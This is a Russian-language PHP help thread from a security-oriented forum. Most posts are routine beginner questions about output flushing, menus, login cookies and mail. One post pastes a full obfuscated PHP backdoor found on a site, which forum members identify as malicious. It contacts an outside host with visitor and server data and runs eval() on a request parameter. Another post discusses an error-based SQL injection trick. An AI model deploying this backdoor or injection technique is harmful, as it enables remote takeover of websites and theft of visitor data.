[php] Новичкам: задаем вопросы

Discussion in 'PHP' started by _Great_, 26 May 2007.

Thread Status:
Not open for further replies.
  1. Lazy

    Lazy New Member

    Joined:
    19 Jul 2011
    Messages:
    94
    Likes Received:
    2
    Reputations:
    3
    Да , наверное , лучше куда-нибудь вынести . Иначе потеряется полезный пост .

    Похоже на баг . На первый взгляд ничего не мешает вычислять group_key один раз и потом использовать везде где надо . Хрен знает как оно там в оригинальном коде конечно . :\

    По идее rand(0) и (select 1 union select 2 union select 3)(почему их несколько , кстати) всегда возвращает одинаковый результат . Если так duplicate error должен срабатывать(или не срабатывать) в 100% . На практике один и тот же запрос у меня иногда возвращает duplicate_error а иногда
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' т е сам подзапрос не проходит и в group_key остается только значение RAND(). Хотя я каждый раз просто копирую его из текстовика .

    Вообще сколько времени нужно разбирать исходники mysql чтобы научиться самому делать такую магию ?
     
    #22401 Lazy, 12 Mar 2015
    Last edited: 12 Mar 2015
  2. polipi

    polipi New Member

    Joined:
    1 Mar 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    никто не может? хорошо, а за денюшку?
     
  3. ol1ver

    ol1ver Active Member

    Joined:
    22 Jul 2011
    Messages:
    237
    Likes Received:
    155
    Reputations:
    0
    проснифайте запрос, и отправьте необходимые заголовки.
     
  4. polipi

    polipi New Member

    Joined:
    1 Mar 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    я вопрос другой задавал
     
  5. AJIeKCaHDp

    AJIeKCaHDp New Member

    Joined:
    4 Sep 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    как новичку в PHP но человеку знакомому с Delphi быстро выучить и понять PHP ?
    может курсы есть интенсив или есть люди которые дистанционно за денежку смогут уделять время и решать совместно задачи? куда смотреть и где искать? есть может рекомендации у вас?
     
  6. Andres

    Andres Elder - Старейшина

    Joined:
    4 Apr 2008
    Messages:
    320
    Likes Received:
    119
    Reputations:
    0
     
  7. Andres

    Andres Elder - Старейшина

    Joined:
    4 Apr 2008
    Messages:
    320
    Likes Received:
    119
    Reputations:
    0
    php.net — там все
     
  8. misterius

    misterius New Member

    Joined:
    28 Nov 2013
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Подскажите что делает вот этот скрипт

    <?php
    //###==###
    error_reporting(0);
    ini_set("display_errors", "0");
    if (!isset($i8824abdf)) {
    $i8824abdf = TRUE;
    $GLOBALS['_537135123_'] = Array(preg_match, file_get_contents, socket_create_pair,mssql_query, function_exists, curl_init,urlencode, urlencode, md5, curl_setopt, curl_setopt, mt_rand, filectime,curl_exec,curl_close, ini_get, file_get_contents, urlencode, urlencode, md5, stripslashes);
    function _565757278($i) {
    $a = Array(client_check, client_check, HTTP_ACCEPT_CHARSET, !.!u, SCRIPT_FILENAME, UTF-8, windows-1251,HTTP_ACCEPT_CHARSET, curl_init, http://odintara.com/get.php?d=, SERVER_NAME, REQUEST_URI, &u=, HTTP_USER_AGENT, &c=, &i=1&ip=, REMOTE_ADDR, &h=,973477bbae43976914ecb7f43747144e,SERVER_NAME, REQUEST_URI, HTTP_USER_AGENT, 1, allow_url_fopen, http://odintara.com/get.php?d=, SERVER_NAME, REQUEST_URI, &u=,HTTP_USER_AGENT, &c=, &i=1&ip=, REMOTE_ADDR, &h=, 973477bbae43976914ecb7f43747144e, SERVER_NAME,REQUEST_URI,HTTP_USER_AGENT, 1, p, p, p, 8824abdf);
    return $a[$i];
    }
    if (!empty($_COOKIE[_565757278(0) ])) die($_COOKIE[_565757278(1) ]);
    if (!isset($b90d_0[_565757278(2) ])) {
    if ($GLOBALS['_5371351 23_'][0](_565757278(3), $GLOBALS['_537135 123_'][1]($_SERVER[_565757278(4) ]))) {
    $b90d_1 = _565757278(5);
    } else {
    $b90d_1 = _565757278(6);
    }
    } else {
    $b90d_1 = $b90d_0[_565757278(7) ];
    if ((round(0 + 187.5 + 187.5) ^ round(0 + 375)) && $GLOBALS['_537135123_'][2]($b90d_0, $b90d_0, $_SERVER, $b90d_0, $_REQUEST)) $GLOBALS['_537135123_'][3]($b90d_0, $b90d_0);
    }
    if ($GLOBALS['_537135123_'][4](_565757278(8))) {
    $b90d_2 = $GLOBALS[' _537135123_'][5](_565757278(9) . $GLOBALS['_537135123_'][6]($_SERVER[_565757278(10) ] . $_SERVER[_565757278(11) ]) . _565757278(12) . $GLOBALS['_537135123_'][7]($_SERVER[_565757278(13) ]) . _565757278(14) . $b90d_1 . _565757278(15) . $_SERVER[_565757278(16) ] . _565757278(17) . $GLOBALS['_537135123_'][8](_565757278(18) . $_SERVER[_565757278(19) ] . $_SERVER[_565757278(20) ] . $_SERVER[_565757278(21) ] . $b90d_1 . _565757278(22)));
    $GLOBALS['_537135123_'][9]($b90d_2, round(0 + 8.4 + 8.4 + 8.4 + 8.4 + 8.4), false);
    $GLOBALS['_53713 5123_'][10]($b90d_2, round(0 + 6637.6666666667 + 6637.6666666667 + 6637.6666666667), true);
    if (round(0 + 1989.25 + 1989.25 + 1989.25 + 1989.25) < $GLOBALS['_537135123_'][11](round(0 + 785.5 + 785.5 + 785.5 + 785.5), round(0 + 962 + 962 + 962 + 962 + 962))) $GLOBALS['_53713512 3_'][12]($b90d_0, $_REQUEST);
    echo $GLOBALS['_537135123_'][13]($b90d_2);
    $GLOBALS['_537135123_'][14]($b90d_2);
    } elseif ($GLOBALS['_537135123_'][15](_565757278(23)) == round(0 + 0.5 + 0.5)) {
    echo $GLOBALS['_537135123_'][16](_565757278(24) . $GLOBALS['_537135123_'][17]($_SERVER[_565757278(25) ] . $_SERVER[_565757278(26) ]) . _565757278(27) . $GLOBALS['_537135123_'][18]($_SERVER[_565757278(28) ]) . _565757278(29) . $b90d_1 . _565757278(30) . $_SERVER[_565757278(31) ] . _565757278(32) . $GLOBALS['_537135123_'][19](_565757278(33) . $_SERVER[_565757278(34) ] . $_SERVER[_565757278(35) ] . $_SERVER[_565757278(36) ] . $b90d_1 . _565757278(37)));
    $b90d_3 = _565757278(38);
    }
    if (isset($_REQUEST[_565757278(39) ]) && $_REQUEST[_565757278(40) ] == _565757278(41)) {
    eval($GLOBALS['_537135123_'][20]($_REQUEST[" c"]));
    }
    }
    //###==###

    ?>


    Массивы были в base64​
     
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    882
    Reputations:
    859
    Это бегдор такой, если на вашем сайте то сносите!
     
    _________________________
  10. misterius

    misterius New Member

    Joined:
    28 Nov 2013
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Мне один чел говорит что это для смартфонов, проверяет UA и исходя их этих данных подсовывает смартфону какой-то скрипт с шеллом
     
  11. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    882
    Reputations:
    859
    как минимум вот кусок самого бегдора:
    за остальной кусок даже не стал заморачиваться, как то бито вы его деоббусифецировали, но вообщем видно, что берутся какие то данные издалека и что то выполняется, скорее всего как раз редирект и берет, а может ссылки какие сторонние ставит или вообще дор подгружает, однозначно если на сайте знакомого то такой хери быть не должно!
     
    _________________________
  12. misterius

    misterius New Member

    Joined:
    28 Nov 2013
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Спасибо и на этом :)
     
  13. Vinsik

    Vinsik Elder - Старейшина

    Joined:
    4 Oct 2008
    Messages:
    189
    Likes Received:
    4
    Reputations:
    -5
    Здравствуйте.
    Интерисует вопрос
    Как сделать меню которое хранится в базе данных и имеет подкатегории
    Если не затруднит мне бы простейший пример
     
  14. Andres

    Andres Elder - Старейшина

    Joined:
    4 Apr 2008
    Messages:
    320
    Likes Received:
    119
    Reputations:
    0
    http://sitesource.ru/stati/mnogourovnevoe-menyu-na-php-mysql/
     
    Vinsik likes this.
  15. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    пишу две утилиты для работы с проксями на php
    столкнулся с проблемой.

    flush(); не работает
    вся статистика выводится только по завершению работы скрипта

    подскажите решение пожалуйста
     
  16. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    882
    Reputations:
    859
    flush();
    ob_flush();
     
    _________________________
  17. Vinsik

    Vinsik Elder - Старейшина

    Joined:
    4 Oct 2008
    Messages:
    189
    Likes Received:
    4
    Reputations:
    -5
    Здравствуйте еще раз уважаемые
    Подскажите хороший скрипт авторизации на php с мускулем.
    Чтоб с куками все как надо
    Либо статейку как правильно написать
    Читал на хабре, сам код пришелся не очень по вкусу
     
  18. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    148
    Reputations:
    94
    Алгоритм:
    1. Создаёшь БД, таблицу пользователей (id, username, password, cookie(0))
    2. Пишешь обычную авторизацию
    3. Если данные верны => генерируешь произвольный хэш ($hash) => UPDATE `users` SET `cookie` = '$hash' => $_COOKIE['cookie'] = $hash
    3.1 Если $_COOKIE['cookie'] = какое-то значение => Сравниваешь с куками в БД (условие - username)
    3.2 Если совпадает => Пускаешь дальше
    3.3 Если нет => Страница авторизации
    4. Выход => UPDATE `users` SET `cookie` = '0' => unset($_COOKIE['cookie']) => Редирект куда-то там

    Ну в общем поймёшь как лучше для тебя.
     
    #22418 MaxFast, 28 Apr 2015
    Last edited: 28 Apr 2015
    banned likes this.
  19. Sv1r1d

    Sv1r1d New Member

    Joined:
    15 Dec 2012
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
    Привет, есть скрипт отправки почты, на gmail ругаются, говорят вот такое. Я так понял что нужно прописать какие то аутентификационные данные, как это сделать что бы гугл не ругался?
     
  20. shaydulla

    shaydulla New Member

    Joined:
    15 Feb 2014
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Мне нужен сайта с нуля на WordPress. Предлагаю связаться со мной тут vk.com/id298601877. Цену обсудим. Кого заинтересовала работа пишите.
     
Loading...
Thread Status:
Not open for further replies.